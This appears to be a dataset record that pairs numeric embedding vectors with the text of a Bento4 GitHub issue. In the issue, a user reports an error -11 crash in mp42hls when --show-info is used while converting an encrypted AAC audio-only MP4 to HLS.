0.005821071099489927, 0.007200361229479313, 0.0014367602998390794, -0.017735954374074936, -0.01599041186273098, -0.012538290582597256, -0.014392929151654243, 0.007254909258335829, -0.04220471531152725, -0.010730408132076263, -0.012296720407903194, -0.00764453923329711, 0.007208153605461121, 0.0002771242870949209, 0.024157054722309113, -0.004800240509212017, 0.0029378095641732216, -0.00833808071911335, 0.002904691034927964, -0.0030508022755384445, 0.016333285719156265, -0.010769370943307877, -0.007722465321421623, 0.00518207810819149, -0.0004161734541412443, -0.023876521736383438, -0.013691595755517483, -0.009810881689190865, -0.001192267518490553, -0.011899298056960106, -0.0142214922234416, -0.0020747792441397905, -0.007457516621798277, 0.022318001836538315, 0.009764125570654869, -0.002517009386792779, -0.0004283493908587843, 0.02111794240772724, -0.016239775344729424, -0.000312921532895416, 0.014821521937847137, -0.01634887233376503, -0.016691746190190315, 0.011392778716981411, 0.00000925371114135487, -0.007734153885394335, 0.013278587721288204, 0.021180283278226852, 0.008166642859578133, -0.031466513872146606, -0.009655029512941837, -0.016146264970302582, -0.010878467932343483, -0.03313412889838219, -0.0070484052412211895, 0.008899147622287273, 0.01337209902703762, 0.0059769232757389545, -0.011720067821443081, 0.010574555955827236, 0.025419456884264946, 0.014089018106460571, -0.0045664627104997635, 0.005914582405239344, 0.0016140419756993651, 0.0071068499237298965, -0.0032144468277692795, -0.00635876040905714, -0.027414361014962196, 0.033695194870233536, 0.00100134895183146, 0.010738200508058071, -0.001765023567713797, 0.010917430743575096, 0.011829164810478687, 0.009491384960711002, 0.0001929885766003281, 0.011665520258247852, -0.01680084317922592, -0.02236475795507431, -0.00845496915280819, -0.004601529333740473, 0.02001139335334301, 0.009031621739268303, -0.022676462307572365, -0.002353364834561944, -0.000300745596177876, -0.014868278056383133, -0.007617264986038208, 0.0023514165077358484, 0.023424550890922546, -0.015047507360577583, -0.025855841115117073, -0.013286380097270012, -0.03600180521607399, 0.0280845258384943, 0.006982168182730675, 0.009919977746903896, -0.02426615171134472, 0.0013471454149112105, 0.022380342707037926, -0.00524052232503891, -0.007305561099201441, -0.017408665269613266, 0.01775153912603855, -0.005856137722730637, -0.01733073964715004, -0.007375694345682859, 0.017969733104109764, 0.022130979225039482, 0.016146264970302582, 0.005536641459912062, 0.0036761583760380745, 0.0037755139637738466, 0.03210550546646118, 0.009242021478712559, -0.01239023171365261, 0.01337209902703762, 0.019123036414384842, -0.005657426547259092, -0.00004334632831159979, -0.008088717237114906, -0.007621161174029112, 0.027866331860423088, 0.00899265892803669, -0.007395176216959953, -0.004309306852519512, -0.00847055483609438, 0.010551178827881813, 0.01338768471032381, -0.017735954374074936, 0.013676010072231293, -0.003222239436581731, 0.010395326651632786, -0.000713509798515588, -0.014883862808346748, -0.019029526039958, -0.00764453923329711, -0.017315153032541275, -0.0063470713794231415, 0.0036021287087351084, -0.012320098467171192, -0.0002296381426276639, -0.01804765872657299, 0.008883561939001083, -0.017190473154187202, 0.00845496915280819, -0.01344223227351904, 0.016146264970302582, -0.005357411690056324, -0.019528251141309738, -0.019216548651456833, -0.00672111613675952, -0.006974375806748867, 0.011361608281731606, -0.025809086859226227, 0.01448644045740366, -0.018780162557959557, -0.0023338831961154938, 0.01515660434961319, 0.005571708083152771, -0.004243069794028997, 0.008244569413363934, -0.02959628961980343, -0.009896599687635899, -0.014938411302864552, 0.009623859077692032, -0.009818674065172672, 0.0023085572756826878, -0.005232729949057102, -0.006152256391942501, 0.012701936066150665, 0.0017932717455551028, -0.011813579127192497, -0.005396374501287937, -0.00668604951351881, -0.025123337283730507, 0.015460515394806862, 0.003956691827625036, -0.013512365520000458, 0.0036781064700335264, 0.006779560819268227, -0.024702537804841995, -0.00510804820805788, 0.029970334842801094, 0.008696540258824825, 0.014120188541710377, 0.006350968033075333, 0.009234229102730751, 0.004878166597336531, -0.013169491663575172, -0.00930436234921217, -0.004975574091076851, 0.02531035989522934, -0.02262970618903637, -0.00002193190266552847, -0.012156453914940357, -0.0008153006201609969, 0.003290424821898341, 0.03282242640852928, 0.019107451662421227, 0.0028832615353167057, -0.004554773680865765, 0.022084224969148636, -0.006604227237403393, 0.002569609321653843, -0.0038417510222643614, -0.007660124450922012, 0.017642443999648094, -0.0046171145513653755, 0.0039664325304329395, -0.0031521061901003122, 0.004040462430566549, -0.014081225730478764, 0.004835307598114014, 0.022442683577537537, 0.004395025782287121, -0.01450202614068985, -0.00884459912776947, 0.016302116215229034, 0.0030644393991678953, -0.007289975881576538, -0.00819002091884613, -0.012499327771365643, 0.027585798874497414, -0.001941331080161035, 0.008821221999824047, -0.003968380857259035, 0.0010334934340789914, -0.024312907829880714, -0.011377193965017796, 0.009881014935672283, -0.003044957760721445, 0.006288627162575722, 0.009132925420999527, -0.00024388398742303252, 0.013824069872498512, 0.0018575607100501657, -0.009335532784461975, 0.01712813228368759, -0.0022520609200000763, 0.0017591791693121195, 0.009390081278979778, 0.001027648919261992, 0.00045002257684245706, -0.006635397672653198, -0.015974827110767365, -0.0035651137586683035, 0.0011299267644062638, -0.00969399232417345, -0.005466507747769356, -0.010855089873075485, -0.009242021478712559, -0.01402667723596096, 0.01313052885234356, 0.02629222720861435, 0.0049950554966926575, -0.015320248901844025, -0.00338003970682621, 0.0021994609851390123, 0.011618764139711857, 0.017408665269613266, 0.014720218256115913, 0.00032899377401918173, 0.00668604951351881, -0.002195564564317465, -0.002618313068524003, 0.006697738543152809, -0.00524052232503891, -0.018748991191387177, 0.004192417953163385, 0.010636896826326847, -0.002818972570821643, 0.012920128181576729, 0.008564066141843796, 0.007180879358202219, 0.016832012683153152, -0.023268699645996094, -0.0016296271933242679, -0.026370152831077576, -0.006779560819268227, 0.023066092282533646, 0.01450202614068985, 0.01319286972284317, -0.023331040516495705, 0.01284999493509531, -0.015109848231077194, 0.006604227237403393, -0.008361457847058773, -0.02027634158730507, 0.007632850203663111, 0.00237869075499475, 0.010317400097846985, -0.017954146489501, 0.004663870204240084, -0.0009058895520865917, -0.004414507187902927, 0.023486891761422157, 0.01350457314401865, -0.002127379411831498, 0.0304378904402256, 0.00228128326125443, 0.01119796372950077, 0.013153905980288982, -0.0043015144765377045, 0.0018371051410213113, 0.011322645470499992, -0.009070584550499916, -0.015164396725594997, -0.02364274300634861, -0.003044957760721445, -0.010208304040133953, 0.0072627016343176365, -0.007523753680288792, 0.006362656597048044, 0.0035865434911102057, 0.0009506969945505261, 0.0384642668068409, 0.0170346200466156, 0.00491323322057724, -0.01267076563090086, 0.023549232631921768, 0.006541886366903782, -0.01959059201180935, 0.006573056802153587, -0.0018721717642620206, -0.002341675804927945, 0.007870524190366268, -0.0027975428383797407, -0.007153605576604605, -0.00017983856378123164, 0.01602158322930336, -0.005801589693874121, 0.017502175644040108, -0.02135171927511692, 0.015647538006305695, -0.0018108050571754575, 0.011743445880711079, 0.0038534400518983603, -0.01055897120386362, 0.007406864780932665, -0.010745993815362453, 0.009662821888923645, -0.006265249103307724, 0.014642292633652687, -0.037716176360845566, 0.0037774620577692986, -0.005595085676759481, 0.023518063127994537, 0.004472951404750347, 0.013364306651055813, 0.03341466188430786, -0.007890005595982075, -0.010387534275650978, -0.023331040516495705, 0.007578302174806595, 0.001028622966259718, 0.004656077828258276, 0.028489740565419197, -0.004367751535028219, -0.0026514315977692604, 0.019481496885418892, 0.02158549800515175, -0.0071107461117208, 0.00814326573163271, 0.012304512783885002, -0.0021371201146394014, -0.019543837755918503, 0.006549679208546877, -0.0065185087732970715, -0.022941410541534424, 0.003964484669268131, -0.004905440844595432, 0.03269774466753006, -0.00410280330106616, 0.025357116013765335, -0.009569310583174229, 0.0012448675697669387, -0.003644987940788269, -0.009678407572209835, -0.004663870204240084, 0.0025851945392787457, 0.011875919997692108, 0.009132925420999527, -0.010917430743575096, -0.003972277045249939, -0.009990110993385315, 0.020151659846305847, 0.004850892815738916, -0.011836957186460495, 0.006035367492586374, -0.007254909258335829, -0.0036975881084799767, 0.01998022198677063, 0.009881014935672283, 0.02435966208577156, 0.0223024170845747, -0.028552081435918808, -0.022972580045461655, -0.031248319894075394, 0.006549679208546877, 0.003982017748057842, -0.0029358614701777697, -0.017907392233610153, 0.0028131280560046434, -0.010465459898114204, 0.016457967460155487, 0.018920429050922394, -0.02233358658850193, -0.0028754689265042543, 0.01384744793176651, -0.0019013939891010523, -0.026151960715651512, -0.0020884163677692413, -0.001653979066759348, 0.01311494316905737, -0.00847055483609438, -0.0652708038687706, 0.011860335245728493, 0.014844899997115135, -0.007940657436847687, 0.010449874214828014, -0.005123633425682783, 0.0008060468826442957, -0.011205757036805153, -0.003987862262874842, -0.0011669415980577469, -0.008922525681555271, -0.022801144048571587, 0.02079065330326557, -0.008080924861133099, -0.010122585110366344, 0.006370449438691139, -0.002931965282186866, 0.01700345054268837, 0.00969399232417345, 0.006822419818490744, 0.006779560819268227, 0.00899265892803669, -0.02125820890069008, -0.004285929258912802, -0.0015721567906439304, 0.005626256112009287, 0.01658264920115471, -0.021694594994187355, -0.024468759074807167, -0.004761277697980404, 0.0006326615693978965, 0.014385136775672436, 0.00814326573163271, 0.011268097907304764, -0.0019179533701390028, -0.026011694222688675, 0.0004422299680300057, -0.007819872349500656, 0.002269594231620431, -0.01469684112817049, -0.002228683093562722, -0.011572008952498436, 0.00872771069407463, -0.014127980917692184, 0.015585197135806084, -0.019668519496917725, 0.0016832012915983796, 0.02507658116519451, -0.017283983528614044, -0.0004673124058172107, -0.015413760207593441, 0.006830212660133839, 0.010418703779578209, -0.013863032683730125, -0.0061639454215765, 0.010847297497093678, -0.02259853482246399, -0.018858088180422783, -0.009686199948191643, -0.021273793652653694, -0.0007412709528580308, -0.007063990458846092, -0.005263900384306908, -0.0019725013989955187, 0.0032748396042734385, 0.008525102399289608, 0.0005615541595034301, 0.02671302855014801, 0.01890484429895878, -0.012320098467171192, 0.00838483590632677, -0.0017065791180357337, 0.012701936066150665, -0.022224491462111473, 0.005700286012142897, 0.011166793294250965, -0.026011694222688675, 0.006541886366903782, 0.004769070073962212, 0.02177252061665058, 0.016146264970302582, -0.0004906901740469038, 0.01280323974788189, -0.009561518207192421, 0.0009696914930827916, -0.003656676970422268, 0.007558820769190788, 0.02132054977118969, 0.00105005269870162, -0.0008961488492786884, 0.011447327211499214, 0.0006277912179939449, -0.010184925980865955, 0.027866331860423088, 0.018858088180422783, -0.0005488911410793662, 0.0009867377812042832, 0.014665670692920685, -0.00333133595995605, 0.012592839077115059, 0.01876457780599594, -0.015608575195074081, 0.02956511825323105, 0.008080924861133099, -0.0044028181582689285, -0.01048104465007782, -0.0161150936037302, -0.02439083345234394, 0.017206057906150818, -0.02060363069176674, 0.01055897120386362, 0.009117340669035912, 0.003083920804783702, -0.001202008337713778, 0.0006117189768701792, 0.005856137722730637, 0.006319797597825527, -0.004924922250211239, -0.018858088180422783, -0.025263603776693344, -0.024203810840845108, -0.01435396634042263, -0.005115841049700975, -0.005797693505883217, -0.002216994296759367, -0.003682002890855074, -0.004648284986615181, -0.005513263400644064, -0.0023494684137403965, 0.0022053054999560118, 0.012398024089634418, -0.002028023824095726, 0.005789900664240122, 0.009592688642442226, 0.012140868231654167, -0.01647355407476425, 0.027087071910500526, 0.008603028953075409, 0.019902296364307404, -0.006596434861421585, -0.016302116215229034, -0.01991788111627102, 0.010294022969901562, -0.006421101279556751, -0.009701785631477833, -0.0056535303592681885, -0.019793199375271797, 0.01162655744701624, -0.0009453396196477115, -0.00017862097593024373, 0.013060394674539566, 0.007566613145172596, -0.02209980972111225, 0.013395477086305618, 0.0075860945507884026, 0.02262970618903637, 0.01593586429953575, 0.007617264986038208, -0.019497081637382507, -0.006931516341865063, 0.003769669448956847, 0.01998022198677063, -0.008719917386770248, 0.012031772173941135, -0.007687398232519627, 0.00095118407625705, -0.004406714346259832, -0.00718477601185441, -0.0044028181582689285, 0.013769521377980709, -0.001841975492425263, 0.028396228328347206, -0.011042112484574318, -0.012156453914940357, 0.00021076544362585992, 0.016925524920225143, -0.026837708428502083, -0.013052602298557758, 0.017548931762576103, -0.016878768801689148, -0.0008114043157547712, 0.0008995580719783902, -0.0005079800030216575, 0.0024215499870479107, -0.012678558006882668, -0.009600481018424034, 0.009904392994940281, 0.00015000751591287553, 0.0017202161252498627, -0.00018763115804176778, 0.024110300466418266, 0.040396831929683685, 0.013761729001998901, -0.0006540912436321378, -0.011735653504729271, -0.0031871728133410215, -0.017611272633075714, 0.0016179382801055908, -0.019278889521956444, -0.0023962240666151047, 0.013707180507481098, 0.006748390384018421, 0.013722766190767288, 0.006970479153096676, -0.0036742102820426226, -0.02060363069176674, 0.0019354866817593575, 0.004706729669123888, -0.006276938132941723, 0.01742425002157688, 0.013481195084750652, 0.0005347670521587133, -0.008228983730077744, 0.009865430183708668, -0.007913383655250072, -0.012818824499845505, -0.0032358765602111816, 0.016504723578691483, -0.004511914681643248, 0.011361608281731606, 0.025949353352189064, 0.009888807311654091, 0.014260455034673214, 0.01571767032146454, 0.004223588388413191, -0.02158549800515175, 0.008938110433518887, 0.03254188969731331, 0.015382589772343636, 0.028832614421844482, -0.0047885519452393055, -0.004059943836182356, 0.01239023171365261, 0.009592688642442226, -0.0041885217651724815, 0.011322645470499992, 0.0031891209073364735, -0.02200629748404026, 0.0038144770078361034, 0.002592987148091197, 0.023564817383885384, 0.008119887672364712, -0.011899298056960106, -0.0054898858070373535, -0.033757537603378296, 0.02308167703449726, 0.005980819463729858, -0.0028988467529416084, 0.003206654218956828, -0.011735653504729271, 0.0181099995970726, -0.005715871229767799, -0.006444478873163462, 0.026151960715651512, -0.005571708083152771, -0.00812768004834652, -0.00672111613675952, 0.011665520258247852, 0.00025886038201861084, -0.003292372915893793, -0.002846246585249901, -0.005610670894384384, 0.021398475393652916, 0.01496178936213255, -0.010278437286615372, -0.0021877719555050135, -0.007141916546970606, -0.019699689000844955, -0.0066626719199121, 0.003943054936826229, 0.006015886086970568, -0.018203509971499443, -0.011579801328480244, -0.0069471015594899654, 0.015226737596094608, 0.004418403375893831, -0.008509517647325993, 0.017502175644040108, -0.009460214525461197, -0.010091414675116539, -0.011649934574961662, -0.020650386810302734, -0.017471006140112877, 0.012943506240844727, 0.008041962049901485, 0.004819722380489111, -0.02033868245780468, -0.022130979225039482, 0.003007943043485284, -0.0007193542551249266, 0.014907240867614746, -0.0009657951886765659, -0.003531995229423046, 0.002479994436725974, -0.035721272230148315, -0.008805636316537857, 0.0011669415980577469, 0.015803389251232147, 0.0038359067402780056, 0.019762029871344566, -0.007660124450922012, 0.009522555395960808, -0.02079065330326557, -0.008291324600577354, 0.0026884465478360653, -0.00751206511631608, 0.011618764139711857, -0.0015098159201443195, -0.004749588668346405, 0.007402968592941761, -0.00020394691091496497, 0.00017192419909406453, -0.0029982023406773806, 0.005185974296182394, -0.0035845953971147537, 0.009086170233786106, -0.015187774784862995, -0.01974644511938095, -0.003031320869922638, -0.017860636115074158, 0.004278136417269707, 0.012359061278402805, -0.02269204705953598, -0.004663870204240084, 0.01338768471032381, 0.019138621166348457, 0.011977223679423332, 0.013286380097270012, 0.008891355246305466, 0.0037501880433410406, 0.013761729001998901, -0.005462611559778452, -0.02593376860022545, 0.02040102332830429, -0.01998022198677063, 0.004469055216759443, -0.010122585110366344, -0.006993857212364674, -0.02412588521838188, -0.011236927472054958, -0.0026709132362157106, 0.016629405319690704, -0.005447026342153549, -0.0023981721606105566, 0.00024510157527402043, -0.019575007259845734, 0.022130979225039482, -0.0018711977172642946, 0.007558820769190788, 0.010847297497093678, -0.02164783887565136, -0.012109697796404362, 0.005887308157980442, 0.025840256363153458, 0.031076882034540176, -0.00672111613675952, 0.00038061972009018064, -0.025980522856116295, -0.01313052885234356, 0.019434740766882896, -0.0021819276735186577, -0.036313507705926895, 0.00047169573372229934, -0.02811569534242153, 0.0018078829161822796, 0.01726839877665043, 0.01736190915107727, 0.0089770732447505, 0.0022520609200000763, -0.0011951897758990526, 0.004589840304106474, -0.005723663605749607, 0.008244569413363934, 0.07431022077798843, 0.008805636316537857, -0.0026962391566485167, -0.003530047135427594, 0.02364274300634861, -0.002357261022552848, -0.02507658116519451, 0.04734782874584198, 0.008041962049901485, 0.019839955493807793, 0.022208906710147858, 0.01863989606499672, 0.0002179492439609021, 0.0033975730184465647, -0.012483743019402027, 0.013450024649500847, 0.028848199173808098, -0.0030644393991678953, -0.009265399537980556, -0.000927806249819696, -0.0043521663174033165, -0.01280323974788189, 0.008049754425883293, -0.011572008952498436, 0.0025520760100334883, -0.005591189488768578, 0.004348270129412413, -0.020026978105306625, 0.0014854640467092395, 0.03260423243045807, -0.013870825059711933, 0.0009969655657187104, -0.00396058801561594, 0.030858689919114113, -0.004289825446903706, 0.0008664395427331328, -0.011034319177269936, 0.027741650119423866, -0.004059943836182356, -0.013146113604307175, 0.009717370383441448, 0.004776862915605307, 0.010013489052653313, -0.00383395841345191, 0.005263900384306908, 0.0014669566880911589, -0.0068341088481247425, 0.0090549997985363, 0.00556781142950058, -0.01726839877665043, -0.00847055483609438, 0.010987563990056515, 0.012569461017847061, -0.00023450850858353078, 0.015647538006305695, 0.0025345426984131336, 0.03198082372546196, 0.017502175644040108, -0.003935262095183134, -0.005423648748546839, 0.01450202614068985, -0.010091414675116539, 0.004609322175383568, 0.013948751613497734, -0.01658264920115471, -0.0035280990414321423, -0.01167331263422966, 0.0028248168528079987, -0.021040016785264015, -0.008525102399289608, -0.0023903795517981052, -0.02334662526845932, -0.001342275063507259, -0.004874270409345627, 0.02089974842965603, -0.005197663325816393, 0.018094412982463837, 0.003243669169023633, -0.007515961304306984, -0.01625536009669304, 0.009195266291499138, 0.0008367302943952382, -0.014525403268635273, -0.007964035496115685, -0.005139218643307686, -0.00400539580732584, -0.003157950472086668, -0.007777013350278139, -0.00643279030919075, 0.0065613677725195885, -0.0053807892836630344, -0.002879365114495158, -0.017517762258648872, -0.008314702659845352, 0.0030040466226637363, 0.009686199948191643, 0.0175956878811121, 0.018203509971499443, 0.008112095296382904, -0.01003686711192131, -0.011953846551477909, 0.0019491236889734864, -0.01778271049261093, -0.0033527654595673084, -0.008766673505306244, 0.015265700407326221, 0.017050204798579216, 0.010403119027614594, -0.006888656876981258, -0.02108677104115486, 0.008018583990633488, 0.007293872069567442, 0.0003509104426484555, 0.024437589570879936, 0.005302863195538521, -0.010839504189789295, 0.016426797956228256, 0.0002149052597815171, 0.006144464015960693, -0.022193320095539093, 0.00009460701403440908, 0.007278286851942539, 0.00041812160634435713, -0.004605425521731377, -0.0053807892836630344, 0.002316349884495139, 0.0061327749863266945, -0.00910954736173153, 0.00338003970682621, 0.019824370741844177, 0.00799520593136549, 0.012452572584152222, -0.017735954374074936, 0.007558820769190788, 0.030172942206263542, 0.018530799075961113, -0.013792899437248707, 0.007215946447104216, -0.014821521937847137, 0.024764878675341606, 0.0052677965722978115, 0.014182529412209988, 0.006584745831787586, -0.009545933455228806, 0.008953696116805077, 0.0035242026206105947, -0.0047885519452393055, 0.001192267518490553, 0.03818373382091522, -0.012382439337670803, -0.009670615196228027, -0.007554924115538597, 0.0014591640792787075, 0.011688897386193275, 0.00576262641698122, -0.002643638988956809, -0.01709696091711521, -0.0007417579763568938, -0.0002995280083268881, 0.0027741650119423866, -0.006097708363085985, 0.0029884616378694773, 0.012483743019402027, 0.014057847671210766, 0.005614567082375288, -0.010722615756094456, 0.01028622966259718, -0.008945902809500694, 0.016878768801689148, -0.01644238270819187, 0.016130678355693817, 0.002004645997658372, -0.0014708529924973845, 0.009148511104285717, -0.015889108180999756, 0.006230182480067015, -0.0005474300705827773, -0.01429162546992302, -0.015803389251232147, -0.007551027927547693, -0.01893601380288601, 0.019933467730879784, -0.019123036414384842, 0.03752915561199188, -0.01831260696053505, 0.004441780969500542, 0.008930318057537079, 0.006245767697691917, 0.01971527375280857, -0.014198114164173603, 0.002957291202619672, 0.045041218400001526, 0.005260004196316004, -0.019247718155384064, 0.001089015626348555, 0.017767123878002167, 0.003272891277447343, -0.011618764139711857, -0.02024517022073269, 0.013317550532519817, 0.005353515036404133, 0.003917729016393423, 0.009771918877959251, 0.011735653504729271, -0.004846996162086725, 0.030921030789613724, -0.007122435141354799, 0.0058171749114990234, -0.023112846538424492, -0.016551479697227478, 0.013317550532519817 ]
103
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I'm running this command on an audio only mp4 file with an aac codec: `mp42hls --index-filename /outpath/media.m3u8 --segment-filename-template /outpath/encrypt/audio/aac/kin/segment-%d.ts --segment-url-template segment-%d.ts --show-info --hls-version 4 --iframe-index-filename /outpath/encrypt/audio/aac/kin/iframes.m3u8 --audio-format ts --encryption-mode AES-128 --encryption-key KEY --encryption-iv-mode random --encryption-key-uri http://example.com --audio-track-id 1 --video-track-id 0 /inpath/fmp4/audiofile.mp4` I keep getting this error: **Exception: binary tool failed with error -11 -** If I remove the show-info argument and add --verbose, I don't get the error and everything works. The issue I have doing that, is I call this from the mp4-hls.py script. That turns on show-info by default and removing that argument I get another error. So my question is, what do I do to fix this?
mp42hls Segmentation Error -11
https://api.github.com/repos/axiomatic-systems/Bento4/issues/619/comments
0
2021-06-28T20:55:36
2021-06-30T20:53:09Z
https://github.com/axiomatic-systems/Bento4/issues/619
931,984,669
619
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : mp42hls Segmentation Error -11 Issue date: --- start body --- I'm running this command on an audio only mp4 file with an aac codec: `mp42hls --index-filename /outpath/media.m3u8 --segment-filename-template /outpath/encrypt/audio/aac/kin/segment-%d.ts --segment-url-template segment-%d.ts --show-info --hls-version 4 --iframe-index-filename /outpath/encrypt/audio/aac/kin/iframes.m3u8 --audio-format ts --encryption-mode AES-128 --encryption-key KEY --encryption-iv-mode random --encryption-key-uri http://example.com --audio-track-id 1 --video-track-id 0 /inpath/fmp4/audiofile.mp4` I keep getting this error: **Exception: binary tool failed with error -11 -** If I remove the show-info argument and add --verbose, I don't get the error and everything works. The issue I have doing that, is I call this from the mp4-hls.py script. That turns on show-info by default and removing that argument I get another error. So my question is, what do I do to fix this? --- end body ---
1,057
[ -0.030573293566703796, -0.0005485661095008254, -0.011269772425293922, -0.016202643513679504, 0.020662499591708183, -0.004328463692218065, -0.03850192576646805, 0.059915244579315186, -0.024356523528695107, 0.05775288864970207, -0.010999477468430996, 0.004538692533969879, 0.012365966103971004, 0.03904251381754875, 0.05736246332526207, -0.008176404051482677, -0.020617451518774033, -0.004531184211373329, -0.03895241767168045, -0.00046128357644192874, 0.03627950698137283, -0.005969000048935413, -0.001133734593167901, 0.012741374783217907, -0.02021200954914093, 0.0010182963451370597, -0.0310838483273983, 0.005465952213853598, -0.01232842542231083, 0.0014622173039242625, 0.001803839229978621, 0.0013636724324896932, 0.0028643691912293434, 0.0033580316230654716, 0.06727325916290283, -0.011630164459347725, 0.03597917780280113, 0.050605107098817825, 0.005694951396435499, 0.04375765100121498, -0.0011825377587229013, -0.04207581654191017, -0.017884476110339165, 0.038021404296159744, -0.02486707828938961, -0.015331695787608624, -0.02663900889456272, -0.010684134438633919, -0.05153612047433853, 0.01094692014157772, 0.0023838458582758904, -0.0021604776848107576, -0.03552868962287903, -0.032014861702919006, 0.010676626116037369, -0.03904251381754875, 0.0470612458884716, 0.021503416821360588, -0.01872539147734642, 0.034657739102840424, -0.03246535360813141, 0.001075546257197857, -0.012696325778961182, 0.022899936884641647, 0.025467732921242714, 0.0028887707740068436, 0.003406834788620472, 0.025948256254196167, -0.029101690277457237, 0.03429734706878662, -0.00942276045680046, -0.02006184682250023, 0.021458366885781288, 0.033216170966625214, 0.003900497453287244, -0.03372672572731972, 0.06036573648452759, 0.019776536151766777, -0.019175881519913673, 0.03540855646133423, -0.04192565381526947, -0.008168895728886127, -0.056581612676382065, 0.019491225481033325, 0.015797201544046402, -0.005946475546807051, -0.048803143203258514, -0.06114658713340759, -0.022404396906495094, -0.017479034140706062, 0.031984828412532806, 0.0076020280830562115, 0.013244422152638435, 0.025212455540895462, -0.011825377121567726, 0.017719294875860214, -0.014348124153912067, -0.02027207426726818, -0.05078530311584473, -0.07057685405015945, -0.014280551113188267, -0.010624068789184093, 0.004046906717121601, -0.025242486968636513, 0.022389380261301994, 0.006798653397709131, 0.02653389424085617, -0.02962726168334484, 0.031624436378479004, 0.09202020615339279, 0.009715579450130463, 0.006246802397072315, 0.022990034893155098, -0.03691019490361214, 0.0019051996059715748, -0.007350504398345947, 0.008934729732573032, -0.04066428169608116, -0.03718048706650734, -0.010849314741790295, -0.0040206280536949635, -0.025707995519042015, -0.02177371084690094, 0.020722566172480583, -0.013717437162995338, 0.06057596206665039, -0.0012491727247834206, -0.0019746501930058002, 0.009850726462900639, 0.003590785199776292, -0.026158485561609268, 0.001598302973434329, 0.013672388158738613, -0.02497219294309616, 0.005113068036735058, -0.027660120278596878, -0.04348735511302948, 0.01708860881626606, 0.0019558798521757126, -0.016442906111478806, -0.048953305929899216, -0.018980668857693672, 0.01248609647154808, 0.006689784582704306, -0.02004683017730713, -0.025167405605316162, 0.011840393766760826, 0.011975540779531002, -0.025377634912729263, 0.016187626868486404, -0.02814064361155033, 0.0028099347837269306, -0.0018798595992848277, 0.0012707588030025363, 0.044538501650094986, -0.004392283037304878, -0.004189562052488327, 0.008041256107389927, -0.006753604393452406, -0.023830950260162354, -0.008213944733142853, -0.03784120827913284, 0.019596340134739876, -0.0005438735242933035, 0.016097528859972954, -0.0009563539060764015, -0.01006095577031374, -0.0062918514013290405, -0.02461180090904236, 0.03633957356214523, 0.003874218789860606, -0.00625806488096714, -0.0015288523864001036, -0.023800916969776154, -0.03829169645905495, -0.026969367638230324, -0.0012182015925645828, 0.026128452271223068, -0.022344332188367844, -0.01707359217107296, -0.02946208231151104, 0.010729183442890644, 0.017433984205126762, 0.0017418968491256237, 0.04982425644993782, -0.01313930843025446, 0.04321705922484398, -0.03979333117604256, 0.0470912791788578, 0.010624068789184093, 0.011727770790457726, 0.038171567022800446, 0.013079242780804634, -0.01696847751736641, 0.020872728899121284, 0.0013880740152671933, -0.0017372042639181018, -0.02962726168334484, -0.004264643881469965, 0.033216170966625214, 0.0013589798472821712, -0.015226581133902073, -0.01998676359653473, -0.0116677051410079, -0.025572847574949265, -0.020497320219874382, 0.0024795751087367535, 0.01887555420398712, 0.007740929257124662, -0.031684502959251404, -0.01875542290508747, -0.01238098181784153, 0.03432738035917282, 0.0016827699728310108, -0.0037991369608789682, -0.000408960971981287, 0.014776090160012245, 0.03300594165921211, -0.02190885692834854, 0.010661609470844269, 0.022179150953888893, 0.009572924114763737, 0.032014861702919006, -0.023665770888328552, -0.028816379606723785, -0.005368345882743597, -0.031834665685892105, 0.0002475351793691516, 0.024251408874988556, -0.006393211893737316, 0.011502525769174099, 0.019476208835840225, -0.02326032891869545, 0.00034678386873565614, -0.004039398860186338, 0.03456764295697212, 0.01868034154176712, -0.04027385637164116, -0.002590320771560073, -0.028846412897109985, -0.009415253065526485, 0.024506686255335808, -0.014933762140572071, 0.009993381798267365, 0.01249360479414463, 0.016818314790725708, 0.0023219033610075712, -0.006776128895580769, -0.009099909104406834, 0.0034537608735263348, 0.014783598482608795, -0.0010605298448354006, 0.039733268320560455, -0.002890647854655981, -0.024161310866475105, 0.05544036999344826, 0.01737391948699951, 0.014498287811875343, 0.01310927513986826, -0.044027943164110184, -0.002273100195452571, -0.007410569582134485, -0.017644213512539864, -0.02974739298224449, 0.03528842702507973, -0.029056640341877937, -0.016548020765185356, -0.005109313875436783, -0.0154518261551857, -0.008341583423316479, -0.007853551767766476, -0.01485117245465517, -0.0472114123404026, -0.007095226086676121, -0.01015105377882719, -0.017464017495512962, 0.035078197717666626, 0.004121988546103239, -0.005458443891257048, 0.0154668428003788, -0.016082512214779854, 0.0312940776348114, 0.00656965421512723, 0.0234104935079813, 0.019536273553967476, -0.011953015811741352, 0.017974574118852615, -0.026038354262709618, -0.04465863108634949, -0.02024204283952713, 0.012831472791731358, 0.03618940711021423, -0.02172866091132164, -0.001531667890958488, -0.01695346087217331, 0.0012041237205266953, 0.0003589846601244062, 0.006802407559007406, 0.010706659406423569, 0.01875542290508747, -0.031924765557050705, 0.008206436410546303, 0.016487954184412956, -0.030618341639637947, -0.02309514954686165, 0.013957698829472065, -0.010473905131220818, 0.01309425849467516, 0.009490334428846836, -0.003369293874129653, 0.034898001700639725, -0.006584670394659042, -0.01838001422584057, 0.012869013473391533, 0.00011479297245386988, -0.014333107508718967, 0.02345554158091545, -0.022269250825047493, -0.022689707577228546, 0.00926508940756321, -0.0058113280683755875, 0.026774154976010323, -0.07105737924575806, 0.04081444442272186, -0.02660897560417652, -0.041385065764188766, -0.016412872821092606, 0.03372672572731972, -0.05583079531788826, 0.019701452925801277, 0.0034162201918661594, -0.030242932960391045, -0.011983049102127552, 0.009602957405149937, 0.03099375031888485, -0.0027142055332660675, -0.02045227214694023, -0.045739807188510895, 0.02621855027973652, -0.009024827741086483, -0.012628751806914806, 0.009317646734416485, 0.009790661744773388, -0.024161310866475105, -0.015076417475938797, 0.003389941528439522, -0.00946030206978321, 0.012568686157464981, 0.0015053893439471722, 0.03742074966430664, 0.0010182963451370597, 0.015812218189239502, 0.015872284770011902, -0.033606596291065216, -0.016217660158872604, -0.05261729657649994, -0.05324798449873924, 0.0018892447696998715, 0.011412427760660648, 0.007113996893167496, 0.01240350678563118, -0.021158039569854736, 0.004523675888776779, 0.0007043607765808702, 0.015151498839259148, 0.021473383530974388, -0.017449000850319862, -0.006937554571777582, -0.023755868896842003, -0.031594403088092804, 0.012989144772291183, 0.01554192416369915, -0.02495717629790306, 0.04381771385669708, -0.005094297230243683, -0.012373474426567554, 0.02187882550060749, -0.009595449082553387, -0.055170077830553055, 0.018049655482172966, -0.034837935119867325, 0.011172166094183922, 0.041385065764188766, 